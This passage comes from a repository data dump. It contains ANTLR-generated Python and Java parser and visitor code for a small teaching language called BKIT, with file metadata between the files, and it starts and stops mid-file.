call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_call_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 76\n self.match(BKITParser.ID)\n self.state = 77\n self.match(BKITParser.LEFT_PAREN)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ID:\n self.state = 78\n self.ids_list()\n self.state = 83\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 84\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 85\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ret_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_ret_stmt\n\n\n\n\n def ret_stmt(self):\n\n localctx = BKITParser.Ret_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_ret_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 87\n self.match(BKITParser.RETURN)\n self.state = 88\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_expr)\n try:\n self.state = 95\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 90\n self.expr1(0)\n self.state = 91\n self.match(BKITParser.PLUS_INT)\n self.state = 92\n self.expr()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 94\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 18\n self.enterRecursionRule(localctx, 18, self.RULE_expr1, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 103\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,8,self._ctx)\n if la_ == 1:\n self.state = 98\n self.expr2(0)\n self.state = 99\n self.match(BKITParser.MINUS_INT)\n self.state = 100\n self.expr1(3)\n pass\n\n elif la_ == 2:\n self.state = 102\n self.expr2(0)\n pass\n\n\n self._ctx.stop = self._input.LT(-1)\n self.state = 110\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,9,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 105\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 106\n self.match(BKITParser.STAR_INT)\n self.state = 107\n self.expr2(0) \n self.state = 112\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,9,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def expr2(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr2Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr2Context,i)\n\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 20\n self.enterRecursionRule(localctx, 20, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 114\n self.operand()\n self._ctx.stop = self._input.LT(-1)\n self.state = 121\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 116\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n\n self.state = 117\n self.match(BKITParser.DIV_INT)\n self.state = 118\n self.expr2(3) \n self.state = 123\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,10,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_operand)\n try:\n self.state = 128\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,11,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 124\n self.match(BKITParser.Integer_literal)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 125\n self.match(BKITParser.Float_literal)\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 126\n self.match(BKITParser.ID)\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 127\n self.call_stmt()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ID)\n else:\n return self.getToken(BKITParser.ID, i)\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list\n\n\n\n\n def ids_list(self):\n\n localctx = BKITParser.Ids_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_ids_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 130\n self.match(BKITParser.ID)\n self.state = 135\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 131\n self.match(BKITParser.COMMA)\n self.state = 132\n self.match(BKITParser.ID)\n self.state = 137\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT(self):\n return self.getToken(BKITParser.INT, 0)\n\n def FLOAT(self):\n return self.getToken(BKITParser.FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 138\n _la = self._input.LA(1)\n if not(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[9] = self.expr1_sempred\n self._predicates[10] = self.expr2_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.6329759955406189, "alphanum_fraction": 0.6747320294380188, "avg_line_length": 26.439775466918945, "blob_id": "dd51d1cdd0168ac676e6dbc9469413f8481e7b2c", "content_id": "ce79dd67c8b7c5d787aef86781ec4474fca75e1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9795, "license_type": "no_license", "max_line_length": 114, "num_lines": 357, "path": "/AST/assignment2/src/main/bkit/parser/.antlr/BKITParser.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from /home/nguyendat/Documents/projects/PPL/AST/assignment2/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.misc.*;\nimport org.antlr.v4.runtime.tree.*;\nimport java.util.List;\nimport java.util.Iterator;\nimport java.util.ArrayList;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class BKITParser extends Parser {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tT__0=1, T__1=2, INTTYPE=3, FLOATTYPE=4, ID=5;\n\tpublic static final int\n\t\tRULE_program = 0, RULE_vardecls = 1, RULE_vardecltail = 2, RULE_vardecl = 3, \n\t\tRULE_mptype = 4, RULE_ids = 5;\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"program\", \"vardecls\", \"vardecltail\", \"vardecl\", \"mptype\", \"ids\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"';'\", \"','\", \"'int'\", \"'float'\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, null, \"INTTYPE\", \"FLOATTYPE\", \"ID\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"BKIT.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\tpublic BKITParser(TokenStream input) {\n\t\tsuper(input);\n\t\t_interp = new ParserATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\tpublic static class ProgramContext extends ParserRuleContext {\n\t\tpublic VardeclsContext vardecls() {\n\t\t\treturn getRuleContext(VardeclsContext.class,0);\n\t\t}\n\t\tpublic TerminalNode EOF() { return getToken(BKITParser.EOF, 0); }\n\t\tpublic ProgramContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_program; }\n\t}\n\n\tpublic final ProgramContext program() throws RecognitionException {\n\t\tProgramContext _localctx = new ProgramContext(_ctx, getState());\n\t\tenterRule(_localctx, 0, RULE_program);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(12);\n\t\t\tvardecls();\n\t\t\tsetState(13);\n\t\t\tmatch(EOF);\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class VardeclsContext extends ParserRuleContext {\n\t\tpublic VardeclContext vardecl() {\n\t\t\treturn getRuleContext(VardeclContext.class,0);\n\t\t}\n\t\tpublic VardecltailContext vardecltail() {\n\t\t\treturn getRuleContext(VardecltailContext.class,0);\n\t\t}\n\t\tpublic VardeclsContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_vardecls; }\n\t}\n\n\tpublic final VardeclsContext vardecls() throws RecognitionException {\n\t\tVardeclsContext _localctx = new VardeclsContext(_ctx, getState());\n\t\tenterRule(_localctx, 2, RULE_vardecls);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(15);\n\t\t\tvardecl();\n\t\t\tsetState(16);\n\t\t\tvardecltail();\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class VardecltailContext extends ParserRuleContext {\n\t\tpublic VardeclContext vardecl() {\n\t\t\treturn getRuleContext(VardeclContext.class,0);\n\t\t}\n\t\tpublic VardecltailContext vardecltail() {\n\t\t\treturn getRuleContext(VardecltailContext.class,0);\n\t\t}\n\t\tpublic VardecltailContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_vardecltail; }\n\t}\n\n\tpublic final VardecltailContext vardecltail() throws RecognitionException {\n\t\tVardecltailContext _localctx = new VardecltailContext(_ctx, getState());\n\t\tenterRule(_localctx, 4, RULE_vardecltail);\n\t\ttry {\n\t\t\tsetState(22);\n\t\t\t_errHandler.sync(this);\n\t\t\tswitch (_input.LA(1)) {\n\t\t\tcase INTTYPE:\n\t\t\tcase FLOATTYPE:\n\t\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t\t{\n\t\t\t\tsetState(18);\n\t\t\t\tvardecl();\n\t\t\t\tsetState(19);\n\t\t\t\tvardecltail();\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase EOF:\n\t\t\t\tenterOuterAlt(_localctx, 2);\n\t\t\t\t{\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tthrow new NoViableAltException(this);\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class VardeclContext extends ParserRuleContext {\n\t\tpublic MptypeContext mptype() {\n\t\t\treturn getRuleContext(MptypeContext.class,0);\n\t\t}\n\t\tpublic IdsContext ids() {\n\t\t\treturn getRuleContext(IdsContext.class,0);\n\t\t}\n\t\tpublic VardeclContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_vardecl; }\n\t}\n\n\tpublic final VardeclContext vardecl() throws RecognitionException {\n\t\tVardeclContext _localctx = new VardeclContext(_ctx, getState());\n\t\tenterRule(_localctx, 6, RULE_vardecl);\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(24);\n\t\t\tmptype();\n\t\t\tsetState(25);\n\t\t\tids();\n\t\t\tsetState(26);\n\t\t\tmatch(T__0);\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class MptypeContext extends ParserRuleContext {\n\t\tpublic TerminalNode INTTYPE() { return getToken(BKITParser.INTTYPE, 0); }\n\t\tpublic TerminalNode FLOATTYPE() { return getToken(BKITParser.FLOATTYPE, 0); }\n\t\tpublic MptypeContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_mptype; }\n\t}\n\n\tpublic final MptypeContext mptype() throws RecognitionException {\n\t\tMptypeContext _localctx = new MptypeContext(_ctx, getState());\n\t\tenterRule(_localctx, 8, RULE_mptype);\n\t\tint _la;\n\t\ttry {\n\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t{\n\t\t\tsetState(28);\n\t\t\t_la = _input.LA(1);\n\t\t\tif ( !(_la==INTTYPE || _la==FLOATTYPE) ) {\n\t\t\t_errHandler.recoverInline(this);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif ( _input.LA(1)==Token.EOF ) matchedEOF = true;\n\t\t\t\t_errHandler.reportMatch(this);\n\t\t\t\tconsume();\n\t\t\t}\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static class IdsContext extends ParserRuleContext {\n\t\tpublic TerminalNode ID() { return getToken(BKITParser.ID, 0); }\n\t\tpublic IdsContext ids() {\n\t\t\treturn getRuleContext(IdsContext.class,0);\n\t\t}\n\t\tpublic IdsContext(ParserRuleContext parent, int invokingState) {\n\t\t\tsuper(parent, invokingState);\n\t\t}\n\t\t@Override public int getRuleIndex() { return RULE_ids; }\n\t}\n\n\tpublic final IdsContext ids() throws RecognitionException {\n\t\tIdsContext _localctx = new IdsContext(_ctx, getState());\n\t\tenterRule(_localctx, 10, RULE_ids);\n\t\ttry {\n\t\t\tsetState(34);\n\t\t\t_errHandler.sync(this);\n\t\t\tswitch ( getInterpreter().adaptivePredict(_input,1,_ctx) ) {\n\t\t\tcase 1:\n\t\t\t\tenterOuterAlt(_localctx, 1);\n\t\t\t\t{\n\t\t\t\tsetState(30);\n\t\t\t\tmatch(ID);\n\t\t\t\tsetState(31);\n\t\t\t\tmatch(T__1);\n\t\t\t\tsetState(32);\n\t\t\t\tids();\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 2:\n\t\t\t\tenterOuterAlt(_localctx, 2);\n\t\t\t\t{\n\t\t\t\tsetState(33);\n\t\t\t\tmatch(ID);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tcatch (RecognitionException re) {\n\t\t\t_localctx.exception = re;\n\t\t\t_errHandler.reportError(this, re);\n\t\t\t_errHandler.recover(this, re);\n\t\t}\n\t\tfinally {\n\t\t\texitRule();\n\t\t}\n\t\treturn _localctx;\n\t}\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\7\\'\\4\\2\\t\\2\\4\\3\\t\"+\n\t\t\"\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\"+\n\t\t\"\\3\\4\\5\\4\\31\\n\\4\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\5\\7%\\n\\7\\3\\7\\2\"+\n\t\t\"\\2\\b\\2\\4\\6\\b\\n\\f\\2\\3\\3\\2\\5\\6\\2\\\"\\2\\16\\3\\2\\2\\2\\4\\21\\3\\2\\2\\2\\6\\30\\3\\2\\2\"+\n\t\t\"\\2\\b\\32\\3\\2\\2\\2\\n\\36\\3\\2\\2\\2\\f$\\3\\2\\2\\2\\16\\17\\5\\4\\3\\2\\17\\20\\7\\2\\2\\3\\20\"+\n\t\t\"\\3\\3\\2\\2\\2\\21\\22\\5\\b\\5\\2\\22\\23\\5\\6\\4\\2\\23\\5\\3\\2\\2\\2\\24\\25\\5\\b\\5\\2\\25\\26\"+\n\t\t\"\\5\\6\\4\\2\\26\\31\\3\\2\\2\\2\\27\\31\\3\\2\\2\\2\\30\\24\\3\\2\\2\\2\\30\\27\\3\\2\\2\\2\\31\\7\"+\n\t\t\"\\3\\2\\2\\2\\32\\33\\5\\n\\6\\2\\33\\34\\5\\f\\7\\2\\34\\35\\7\\3\\2\\2\\35\\t\\3\\2\\2\\2\\36\\37\"+\n\t\t\"\\t\\2\\2\\2\\37\\13\\3\\2\\2\\2 !\\7\\7\\2\\2!\\\"\\7\\4\\2\\2\\\"%\\5\\f\\7\\2#%\\7\\7\\2\\2$ \\3\\2\"+\n\t\t\"\\2\\2$#\\3\\2\\2\\2%\\r\\3\\2\\2\\2\\4\\30$\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.6904126405715942, "alphanum_fraction": 0.692465603351593, "avg_line_length": 34.050357818603516, "blob_id": "b297f6117696db3c37b1ccd164e6460c82629835", "content_id": "f16e11b5dae0ba254537fcfa0931549695b28d89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4871, "license_type": "no_license", "max_line_length": 116, "num_lines": 139, "path": "/SyntaxAnalysis/tut/target/main/bkit/parser/BKITBaseVisitor.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.tree.AbstractParseTreeVisitor;\n\n/**\n * This class provides an empty implementation of {@link BKITVisitor},\n * which can be extended to create a visitor which only needs to handle a subset\n * of the available methods.\n *\n * @param <T> The return type of the visit operation. Use {@link Void} for\n * operations with no return type.\n */\npublic class BKITBaseVisitor<T> extends AbstractParseTreeVisitor<T> implements BKITVisitor<T> {\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitProgram(BKITParser.ProgramContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitVar_declare(BKITParser.Var_declareContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitFunction_declare(BKITParser.Function_declareContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitFunction_body(BKITParser.Function_bodyContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitIds_list_with_type(BKITParser.Ids_list_with_typeContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitStmt(BKITParser.StmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitAssign_stmt(BKITParser.Assign_stmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitCall_stmt(BKITParser.Call_stmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitRet_stmt(BKITParser.Ret_stmtContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExprs_list(BKITParser.Exprs_listContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr(BKITParser.ExprContext ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr0(BKITParser.Expr0Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr1(BKITParser.Expr1Context ctx) { return visitChildren(ctx); }\n\t/**\n\t * {@inheritDoc}\n\t *\n\t * <p>The default implementation returns the result of calling\n\t * {@link #visitChildren} on {@code ctx}.</p>\n\t */\n\t@Override public T visitExpr2(BKITParser.Expr2Context ctx) { return 